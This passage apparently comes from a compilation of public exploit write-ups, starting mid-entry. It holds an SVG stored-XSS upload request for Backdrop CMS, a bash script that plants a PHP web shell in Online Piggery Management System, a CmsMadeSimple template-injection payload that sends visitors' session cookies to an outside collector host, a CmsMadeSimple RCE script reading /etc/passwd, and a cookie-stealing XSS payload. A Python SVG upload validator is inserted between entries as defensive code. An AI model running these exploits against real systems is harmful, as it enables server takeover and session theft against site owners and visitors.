  <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
  <script type="text/javascript">
    alert(document.location);
  </script>
</svg>
```

4. Go to the SVG file (http://localhost/backdrop/files/malas_2.svg)

Request

```http
POST /backdrop/?q=admin/config/system/site-information HTTP/1.1
Host: localhost
Content-Length: 2116
Cache-Control: max-age=0
sec-ch-ua:
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: ""
Upgrade-Insecure-Requests: 1
Origin: http://localhost
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryVXWRsHHM3TVjALpg
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://localhost/backdrop/?q=admin/config/system/site-information
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: SESS31b3aee8377692ae3f36f0cf7fe0e752=ZuJtSS2iu5SvcKAFtpK8zPAxrnmFebJ1q26hXhAh__E
Connection: close

------WebKitFormBoundaryVXWRsHHM3TVjALpg
Content-Disposition: form-data; name="site_name"

My Backdrop Site
------WebKitFormBoundaryVXWRsHHM3TVjALpg
Content-Disposition: form-data; name="site_slogan"

------WebKitFormBoundaryVXWRsHHM3TVjALpg
Content-Disposition: form-data; name="site_mail"

[email protected]
------WebKitFormBoundaryVXWRsHHM3TVjALpg
Content-Disposition: form-data; name="files[site_logo_upload]"; filename="malas.svg"
Content-Type: image/svg+xml

<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
  <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
  <script type="text/javascript">
    alert(document.location);
  </script>
</svg>
------WebKitFormBoundaryVXWRsHHM3TVjALpg
Content-Disposition: form-data; name="site_logo_path"

------WebKitFormBoundaryVXWRsHHM3TVjALpg
Content-Disposition: form-data; name="files[site_favicon_upload]"; filename=""
Content-Type: application/octet-stream

------WebKitFormBoundaryVXWRsHHM3TVjALpg
Content-Disposition: form-data; name="site_favicon_path"

core/misc/favicon.ico
------WebKitFormBoundaryVXWRsHHM3TVjALpg
Content-Disposition: form-data; name="site_frontpage"

home
------WebKitFormBoundaryVXWRsHHM3TVjALpg
Content-Disposition: form-data; name="site_403"

------WebKitFormBoundaryVXWRsHHM3TVjALpg
Content-Disposition: form-data; name="site_404"

------WebKitFormBoundaryVXWRsHHM3TVjALpg
Content-Disposition: form-data; name="form_build_id"

form-PnR6AFEKCB5hAWH3pDT2J0kkZswH0Rdm0qbOFGqNj-Q
------WebKitFormBoundaryVXWRsHHM3TVjALpg
Content-Disposition: form-data; name="form_token"

siOWtyEEFVg7neDMTYPHVZ2D3D5U60S38l_cRHbnW40
------WebKitFormBoundaryVXWRsHHM3TVjALpg
Content-Disposition: form-data; name="form_id"

system_site_information_settings
------WebKitFormBoundaryVXWRsHHM3TVjALpg
Content-Disposition: form-data; name="op"

Save configuration
------WebKitForm
```
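The three SVG cases on this page (ProjeQtOr XSS-2, WinterCMS and Backdrop) all depend on an uploaded SVG being opened directly in the browser as an image-typed document. As an added example, not code from any of those projects, this Python validator parses the upload with the standard library, rejects script elements, `on*` handlers and `javascript:` URLs, and returns the response headers that neutralise anything that slips past it; the two sample SVGs are constructed, the first mirroring the payload above.

```python
"""Server-side gate for SVG uploads: refuse files that carry active content."""
import re
import xml.etree.ElementTree as ET

MAX_BYTES = 512 * 1024
# Elements that execute script or embed foreign (HTML) content inside an SVG.
FORBIDDEN_TAGS = {"script", "foreignobject", "iframe", "embed", "object", "handler"}
# Attributes that take a URL and could therefore smuggle a javascript: scheme.
URL_ATTRS = {"href", "src", "data"}
_CTRL_WS = re.compile(r"[\s\x00-\x1f]")


def _local(name: str) -> str:
    """Strip an XML namespace prefix: '{http://www.w3.org/2000/svg}svg' -> 'svg'."""
    return name.rsplit("}", 1)[-1]


def svg_violations(data: bytes) -> list:
    """Return the reasons an SVG upload must be rejected; an empty list means it is clean."""
    problems = []
    if len(data) > MAX_BYTES:
        return ["file larger than %d bytes" % MAX_BYTES]
    # expat still expands internal entities (billion-laughs style), so refuse any
    # entity declaration outright instead of trusting parser options.
    if b"<!ENTITY" in data.upper():
        return ["entity declaration in DOCTYPE"]
    try:
        root = ET.fromstring(data)
    except ET.ParseError as exc:
        return ["not well-formed XML: %s" % exc]
    if _local(root.tag).lower() != "svg":
        problems.append("root element is <%s>, not <svg>" % _local(root.tag))
    for el in root.iter():
        tag = _local(el.tag).lower()
        if tag in FORBIDDEN_TAGS:
            problems.append("forbidden element <%s>" % _local(el.tag))
        for attr, value in el.attrib.items():
            name = _local(attr).lower()
            if name.startswith("on"):
                # onload=, onclick=, onbegin= ... every on* attribute is an event handler
                problems.append("event handler attribute %s on <%s>" % (name, tag))
            elif name in URL_ATTRS:
                # collapse whitespace/control characters browsers ignore inside a scheme
                scheme = _CTRL_WS.sub("", value).lower()
                if scheme.startswith(("javascript:", "data:text/html", "vbscript:")):
                    problems.append("script URL in %s on <%s>" % (name, tag))
    return problems


def download_headers(filename: str) -> dict:
    """Response headers for serving user uploads even after validation: the file is
    offered as a download, and any script that slips through runs in a sandboxed,
    origin-less context instead of the site's origin."""
    return {
        "Content-Type": "image/svg+xml",
        "Content-Disposition": 'attachment; filename="%s"' % filename,
        "Content-Security-Policy": "sandbox; default-src 'none'; style-src 'unsafe-inline'",
        "X-Content-Type-Options": "nosniff",
    }


# Constructed samples: the first mirrors the payload used in the three reports above.
MALICIOUS_SVG = b"""<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
  <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
  <script type="text/javascript">alert(document.location);</script>
</svg>"""

CLEAN_SVG = b"""<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 50 50">
  <polygon points="0,0 0,50 50,0" fill="#009900"/>
</svg>"""

if __name__ == "__main__":
    for label, blob in (("malicious", MALICIOUS_SVG), ("clean", CLEAN_SVG)):
        print(label, svg_violations(blob) or "accepted")
```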
  22. Online Piggery Management System v1.0 - unauthenticated file upload vulnerability

```bash
#!/bin/bash
# Exploit Title: Online Piggery Management System v1.0 - unauthenticated file upload vulnerability
# Date: July 12 2023
# Exploit Author: 1337kid
# Software Link: https://www.sourcecodester.com/php/11814/online-pig-management-system-basic-free-version.html
# Version: 1.0
# Tested on: Ubuntu
# CVE : CVE-2023-37629
#
# chmod +x exploit.sh
# ./exploit.sh web_url
# ./exploit.sh http://127.0.0.1:8080/

echo " _____ _____ ___ __ ___ ____ ________ __ ___ ___ "
echo " / __\\ \\ / / __|_|_ ) \\_ )__ /__|__ /__ / /|_ ) _ \\"
echo " | (__ \\ V /| _|___/ / () / / |_ \\___|_ \\ / / _ \\/ /\\_, /"
echo " \\___| \\_/ |___| /___\\__/___|___/ |___//_/\\___/___|/_/ "
echo " @1337kid"
echo

if [[ $1 == '' ]]; then
    echo "No URL specified!"
    exit
fi

base_url=$1

unauth_file_upload() {
    # CVE-2023-37629 - File upload vuln
    echo "Generating shell.php"
    #===========
    cat > shell.php << EOF
<?php system(\$_GET['cmd']); ?>
EOF
    #===========
    echo "done"
    curl -s -F [email protected] -F submit=pwned $base_url/add-pig.php > /dev/null
    req=$(curl -s -I $base_url"uploadfolder/shell.php?cmd=id" | head -1 | awk '{print $2}')
    if [[ $req == "200" ]]; then
        echo "Shell uploaded to $(echo $base_url)uploadfolder/shell.php"
    else
        echo "Failed to upload a shell"
    fi
}

req=$(curl -I -s $base_url | head -1 | awk '{print $2}')
if [[ $req -eq "200" ]]; then
    unauth_file_upload
else
    echo "Error"
    echo "Status Code: $req"
fi
```
  23. #Exploit Title: CmsMadeSimple v2.2.17 - session hijacking via Server-Side Template Injection (SSTI)
#Application: CmsMadeSimple
#Version: v2.2.17
#Bugs: SSTI
#Technology: PHP
#Vendor URL: https://www.cmsmadesimple.org/
#Software Link: https://www.cmsmadesimple.org/downloads/cmsms
#Date of found: 13-07-2023
#Author: Mirabbas Ağalarov
#Tested on: Linux

2. Technical Details & POC
========================================
Steps:
1. Log in to the test user account
2. Go to Content Manager
3. Add New Content
4. Set the content_en section to:

```smarty
{$smarty.version}
{{7*7}}
{$smarty.now}
{$smarty.template}
<img src=YOU-SERVER/{$smarty.cookies.CMSSESSID852a6e69ca02}>
<img src=YOU-SERVER/{$smarty.cookies.34a3083b62a225efa0bc6b5b43335d226264c2c1}>
<img src=YOU_SERVER/{$smarty.cookies.__c}>
```

5. If any user visits the page, the hacker hijacks all of their cookies.

payload:
%3Cp%3E%7B%24smarty.version%7D+%7B%7B7*7%7D%7D+%7B%24smarty.now%7D+%7B%24smarty.template%7D+%3Cimg+src%3D%22https%3A%2F%2Fen3uw3qy2e0zs.x.pipedream.net%2F%7B%24smarty.cookies.CMSSESSID852a6e69ca02%7D%22+%2F%3E+%3Cimg+src%3D%22https%3A%2F%2Fen3uw3qy2e0zs.x.pipedream.net%2F%7B%24smarty.cookies.34a3083b62a225efa0bc6b5b43335d226264c2c1%7D%22+%2F%3E+%3Cimg+src%3D%22https%3A%2F%2Fen3uw3qy2e0zs.x.pipedream.net%2F%7B%24smarty.cookies.__c%7D%22+%2F%3E%3C%2Fp%3E

POC Request

```http
POST /admin/moduleinterface.php?mact=CMSContentManager,m1_,admin_editcontent,0&;__c=1c2c31a1c1bff4819cd&;m1_content_id=81&showtemplate=false HTTP/1.1
Host: localhost
Content-Length: 988
sec-ch-ua:
Accept: application/json, text/javascript, */*; q=0.01
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36
sec-ch-ua-platform: ""
Origin: http://localhost
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: CMSSESSID852a6e69ca02=bq83g023otkn4s745acdnvbnu4; 34a3083b62a225efa0bc6b5b43335d226264c2c1=1e91865ac5c59e34f8dc1ddb6fd168a61246751d%3A%3AeyJ1aWQiOjEsInVzZXJuYW1lIjoiYWRtaW4iLCJlZmZfdWlkIjoyLCJlZmZfdXNlcm5hbWUiOiJ0ZXN0IiwiaGFzaCI6IiQyeSQxMCRDQlwvWEIyNEpsWmhJNjhKQ29LcWplZXgyOUVXRDRGN2E1MTNIdUo2c3VXMUd1V3NKRTBNcEMifQ%3D%3D; __c=1c2c31a1c1bff4819cd
Connection: close

mact=CMSContentManager%2Cm1_%2Cadmin_editcontent%2C0&__c=1c2c31a1c1bff4819cd&m1_content_id=81&m1_active_tab=&m1_content_type=content&title=test&content_en=%3Cp%3E%7B%24smarty.version%7D+%7B%7B7*7%7D%7D+%7B%24smarty.now%7D+%7B%24smarty.template%7D+%3Cimg+src%3D%22https%3A%2F%2Fen3uw3qy2e0zs.x.pipedream.net%2F%7B%24smarty.cookies.CMSSESSID852a6e69ca02%7D%22+%2F%3E+%3Cimg+src%3D%22https%3A%2F%2Fen3uw3qy2e0zs.x.pipedream.net%2F%7B%24smarty.cookies.34a3083b62a225efa0bc6b5b43335d226264c2c1%7D%22+%2F%3E+%3Cimg+src%3D%22https%3A%2F%2Fen3uw3qy2e0zs.x.pipedream.net%2F%7B%24smarty.cookies.__c%7D%22+%2F%3E%3C%2Fp%3E&menutext=test&parent_id=-1&showinmenu=0&showinmenu=1&titleattribute=&accesskey=&tabindex=&target=---&metadata=&pagedata=&design_id=2&template_id=10&alias=test&active=0&active=1&secure=0&cachable=0&cachable=1&image=&thumbnail=&extra1=&extra2=&extra3=&wantschildren=0&wantschildren=1&searchable=0&searchable=1&disable_wysiwyg=0&ownerid=1&additional_editors=&m1_ajax=1&m1_apply=1
```

Poc Video: https://youtu.be/zq3u3jRpfqM
  24. CmsMadeSimple v2.2.17 - Remote Code Execution (RCE)

```python
#Exploit Title: CmsMadeSimple v2.2.17 - Remote Code Execution (RCE)
#Application: CmsMadeSimple
#Version: v2.2.17
#Bugs: Remote Code Execution(RCE)
#Technology: PHP
#Vendor URL: https://www.cmsmadesimple.org/
#Software Link: https://www.cmsmadesimple.org/downloads/cmsms
#Date of found: 12-07-2023
#Author: Mirabbas Ağalarov
#Tested on: Linux

import requests

login_url = 'http://localhost/admin/login.php'
username = input('username = ')
password = input('password = ')
upload_url = 'http://localhost/admin/moduleinterface.php'
file_path = input("please phar file name but file must same directory with python file and file content : <?php echo system('cat /etc/passwd') ?> : ")
# phar file content: <?php echo system('cat /etc/passwd') ?>

login_data = {
    'username': username,
    'password': password,
    'loginsubmit': 'Submit'
}

session = requests.Session()
response = session.post(login_url, data=login_data)
if response.status_code == 200:
    print('Login account')
else:
    print('Login problem.')
    exit()

files = {
    'm1_files[]': open(file_path, 'rb')
}
data = {
    'mact': 'FileManager,m1_,upload,0',
    '__c': session.cookies['__c'],
    'disable_buffer': '1'
}

response = session.post(upload_url, files=files, data=data)
if response.status_code == 200:
    print('file upload')
    rce_url = f"http://localhost/uploads/{file_path}"
    rce = requests.get(rce_url)
    print(rce.text)
else:
    print('file not upload')
```
  25. #Exploit Title: CmsMadeSimple v2.2.17 - Stored Cross-Site Scripting (XSS)
#Application: CmsMadeSimple
#Version: v2.2.17
#Bugs: Stored Xss
#Technology: PHP
#Vendor URL: https://www.cmsmadesimple.org/
#Software Link: https://www.cmsmadesimple.org/downloads/cmsms
#Date of found: 12-07-2023
#Author: Mirabbas Ağalarov
#Tested on: Linux

2. Technical Details & POC
========================================
steps:
1. Log in to an account
2. Go to Content Manager
3. Add New Content
4. Type '<img src=x onerror=alert(document.cookie)>' into the metadata section

payload: <img src=x onerror=alert(document.cookie)>

5. Submit Content
6. Visit Content (http://localhost/index.php?page=test)

Request:

```http
POST /admin/moduleinterface.php?mact=CMSContentManager,m1_,admin_editcontent,0&;__c=5c64b42fb42c1d6bba6&showtemplate=false HTTP/1.1
Host: localhost
Content-Length: 584
sec-ch-ua:
Accept: application/json, text/javascript, */*; q=0.01
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36
sec-ch-ua-platform: ""
Origin: http://localhost
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: CMSSESSID852a6e69ca02=g13p5ucajc0v5tker6ifdcaso5; 34a3083b62a225efa0bc6b5b43335d226264c2c1=24f612918e7b1c1e085bed5cab82f2a786f45d5c%3A%3AeyJ1aWQiOjEsInVzZXJuYW1lIjoiYWRtaW4iLCJlZmZfdWlkIjpudWxsLCJlZmZfdXNlcm5hbWUiOm51bGwsImhhc2giOiIkMnkkMTAkLndYMkFFZnc4WTJlcWhhQVJ2LndZT1FVY09hTzMzeVlNYzVDU1V5NnFRQkxkeXJZNUozSTYifQ%3D%3D; __c=5c64b42fb42c1d6bba6
Connection: close

mact=CMSContentManager%2Cm1_%2Cadmin_editcontent%2C0&__c=5c64b42fb42c1d6bba6&m1_content_id=0&m1_active_tab=&m1_content_type=content&title=test&content_en=%3Cp%3Etest%3C%2Fp%3E&menutext=&parent_id=-1&showinmenu=0&showinmenu=1&titleattribute=&accesskey=&tabindex=&target=---&metadata=%3Cimg+src%3Dx+onerror%3Dalert(document.cookie)%3E&pagedata=&design_id=2&template_id=10&alias=&active=0&active=1&secure=0&cachable=0&cachable=1&image=&thumbnail=&extra1=&extra2=&extra3=&wantschildren=0&wantschildren=1&searchable=0&searchable=1&disable_wysiwyg=0&additional_editors=&m1_ajax=1&m1_apply=1
```